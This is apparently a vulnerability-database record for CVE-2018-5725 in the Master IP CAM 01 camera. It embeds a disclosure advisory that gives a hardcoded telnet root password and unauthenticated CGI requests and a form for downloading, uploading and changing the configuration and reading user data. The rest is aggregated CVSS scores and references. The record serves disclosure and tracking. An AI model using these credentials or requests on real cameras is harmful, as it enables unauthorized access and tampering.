var-201801-1648
Vulnerability from variot
MASTER IPCAMERA01 3.3.4.2103 devices allow Unauthenticated Configuration Change, as demonstrated by the port number of the web server. MASTER IPCAMERA01 The device contains an access control vulnerability.Information may be tampered with. MASTERIPCAMERA01 is an IP network camera product. A configuration error vulnerability exists in the MASTERIPCAMERA013.3.4.2103 release. An attacker could exploit this vulnerability to change the configuration. # Exploit Title: Master IP CAM 01 Multiple Vulnerabilities
Date: 17-01-2018
Remote: Yes
Exploit Authors: Daniele Linguaglossa, Raffaele Sabato
Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89
Vendor: Master IP CAM
Version: 3.3.4.2103
CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726
I DESCRIPTION
The Master IP CAM 01 suffers of multiple vulnerabilities:
[CVE-2018-5723] Hardcoded Password for Root Account
[CVE-2018-5724] Unauthenticated Configuration Download and Upload
[CVE-2018-5725] Unauthenticated Configuration Change
[CVE-2018-5726] Unauthenticated Sensitive Information Disclousure
II PROOF OF CONCEPT
[CVE-2018-5723] Hardcoded Password for Root Account
Is possible to access telnet with the hardcoded credential root:cat1029
[CVE-2018-5724] Unauthenticated Configuration Download and Upload
Download:
http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi
Upload Form:
Unauthenticated Configuration Upload
[CVE-2018-5725] Unauthenticated Configuration Change
Change configuration:
http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080
List of available commands here: http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf
[CVE-2018-5726] Unauthenticated Sensitive Information Disclousure
Retrieve sensitive information:
http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser
III REFERENCES
http://syrion.me/blog/master-ipcam/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726 http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "master ip camera01",
"scope": "eq",
"trust": 1.6,
"vendor": "barni",
"version": "3.3.4.2103"
},
{
"_id": null,
"model": "master ipcamera01",
"scope": "eq",
"trust": 0.8,
"vendor": "barni carlo",
"version": "3.3.4.2103"
},
{
"_id": null,
"model": "ipcamera01",
"scope": "eq",
"trust": 0.6,
"vendor": "master",
"version": "3.3.4.2103"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02193"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-570"
},
{
"db": "NVD",
"id": "CVE-2018-5725"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:barni:master_ip_camera01_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
}
]
},
"credits": {
"_id": null,
"data": "Daniele Linguaglossa, Raffaele Sabato",
"sources": [
{
"db": "PACKETSTORM",
"id": "145935"
}
],
"trust": 0.1
},
"cve": "CVE-2018-5725",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2018-5725",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2018-02193",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-135757",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2018-5725",
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-5725",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-5725",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2018-02193",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201801-570",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-135757",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-5725",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02193"
},
{
"db": "VULHUB",
"id": "VHN-135757"
},
{
"db": "VULMON",
"id": "CVE-2018-5725"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-570"
},
{
"db": "NVD",
"id": "CVE-2018-5725"
}
]
},
"description": {
"_id": null,
"data": "MASTER IPCAMERA01 3.3.4.2103 devices allow Unauthenticated Configuration Change, as demonstrated by the port number of the web server. MASTER IPCAMERA01 The device contains an access control vulnerability.Information may be tampered with. MASTERIPCAMERA01 is an IP network camera product. A configuration error vulnerability exists in the MASTERIPCAMERA013.3.4.2103 release. An attacker could exploit this vulnerability to change the configuration. # Exploit Title: Master IP CAM 01 Multiple Vulnerabilities\n# Date: 17-01-2018\n# Remote: Yes\n# Exploit Authors: Daniele Linguaglossa, Raffaele Sabato\n# Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89\n# Vendor: Master IP CAM\n# Version: 3.3.4.2103\n# CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726\n \nI DESCRIPTION\n========================================================================\nThe Master IP CAM 01 suffers of multiple vulnerabilities:\n \n# [CVE-2018-5723] Hardcoded Password for Root Account\n# [CVE-2018-5724] Unauthenticated Configuration Download and Upload\n# [CVE-2018-5725] Unauthenticated Configuration Change\n# [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure\n \n \nII PROOF OF CONCEPT\n========================================================================\n \n## [CVE-2018-5723] Hardcoded Password for Root Account\n \nIs possible to access telnet with the hardcoded credential root:cat1029\n \n \n## [CVE-2018-5724] Unauthenticated Configuration Download and Upload\n \nDownload:\n \nhttp://192.168.1.15/web/cgi-bin/hi3510/backup.cgi\n \nUpload Form:\n \n### Unauthenticated Configuration Upload\n\u003cform name=\"form6\" method=\"post\" enctype=\"multipart/form-data\"\naction=\"cgi-bin/hi3510/restore.cgi\" \u003e\n\u003cinput type=\"file\" name=\"setting_file\" \u003e\n\u003cinput type=\"submit\" value=\"restore\" \u003e\n\u003c/form\u003e\n \n \n## [CVE-2018-5725] Unauthenticated Configuration Change\n \nChange configuration:\n \nhttp://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport\u0026-httport=8080\n \nList of available commands here:\nhttp://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf\n \n \n## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure\n \nRetrieve sensitive information:\n \nhttp://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser\n \n \nIII REFERENCES\n========================================================================\nhttp://syrion.me/blog/master-ipcam/\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726\nhttp://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5725"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
},
{
"db": "CNVD",
"id": "CNVD-2018-02193"
},
{
"db": "VULHUB",
"id": "VHN-135757"
},
{
"db": "VULMON",
"id": "CVE-2018-5725"
},
{
"db": "PACKETSTORM",
"id": "145935"
}
],
"trust": 2.43
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-135757",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=43693",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-135757"
},
{
"db": "VULMON",
"id": "CVE-2018-5725"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2018-5725",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "145935",
"trust": 1.9
},
{
"db": "EXPLOIT-DB",
"id": "43693",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001498",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201801-570",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-02193",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-135757",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-5725",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02193"
},
{
"db": "VULHUB",
"id": "VHN-135757"
},
{
"db": "VULMON",
"id": "CVE-2018-5725"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
},
{
"db": "PACKETSTORM",
"id": "145935"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-570"
},
{
"db": "NVD",
"id": "CVE-2018-5725"
}
]
},
"id": "VAR-201801-1648",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02193"
},
{
"db": "VULHUB",
"id": "VHN-135757"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"_id": null,
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02193"
}
]
},
"last_update_date": "2024-11-23T21:53:28.264000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.barni.it/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-798",
"trust": 1.1
},
{
"problemtype": "CWE-284",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-135757"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
},
{
"db": "NVD",
"id": "CVE-2018-5725"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 3.3,
"url": "http://syrion.me/blog/master-ipcam/"
},
{
"trust": 1.9,
"url": "https://www.exploit-db.com/exploits/43693/"
},
{
"trust": 1.8,
"url": "https://packetstormsecurity.com/files/145935/master-ip-cam-01-hardcoded-password-unauthenticated-access.html"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5725"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5725"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/798.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5726"
},
{
"trust": 0.1,
"url": "http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5726"
},
{
"trust": 0.1,
"url": "https://twitter.com/syrion89"
},
{
"trust": 0.1,
"url": "http://www.themadhermit.net/wp-content/uploads/2013/03/fi9821w-cgi-commands.pdf"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5723"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5724"
},
{
"trust": 0.1,
"url": "http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport\u0026-httport=8080"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5724"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5723"
},
{
"trust": 0.1,
"url": "https://twitter.com/dzonerzy,"
},
{
"trust": 0.1,
"url": "http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-02193"
},
{
"db": "VULHUB",
"id": "VHN-135757"
},
{
"db": "VULMON",
"id": "CVE-2018-5725"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
},
{
"db": "PACKETSTORM",
"id": "145935"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-570"
},
{
"db": "NVD",
"id": "CVE-2018-5725"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-02193",
"ident": null
},
{
"db": "VULHUB",
"id": "VHN-135757",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2018-5725",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001498",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "145935",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201801-570",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2018-5725",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2018-01-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-02193",
"ident": null
},
{
"date": "2018-01-16T00:00:00",
"db": "VULHUB",
"id": "VHN-135757",
"ident": null
},
{
"date": "2018-01-16T00:00:00",
"db": "VULMON",
"id": "CVE-2018-5725",
"ident": null
},
{
"date": "2018-02-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-001498",
"ident": null
},
{
"date": "2018-01-17T03:33:33",
"db": "PACKETSTORM",
"id": "145935",
"ident": null
},
{
"date": "2018-01-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201801-570",
"ident": null
},
{
"date": "2018-01-16T22:29:00.397000",
"db": "NVD",
"id": "CVE-2018-5725",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2018-01-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-02193",
"ident": null
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-135757",
"ident": null
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-5725",
"ident": null
},
{
"date": "2018-02-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-001498",
"ident": null
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201801-570",
"ident": null
},
{
"date": "2024-11-21T04:09:15.260000",
"db": "NVD",
"id": "CVE-2018-5725",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-570"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "MASTER IPCAMERA01 Device access control vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-001498"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-570"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.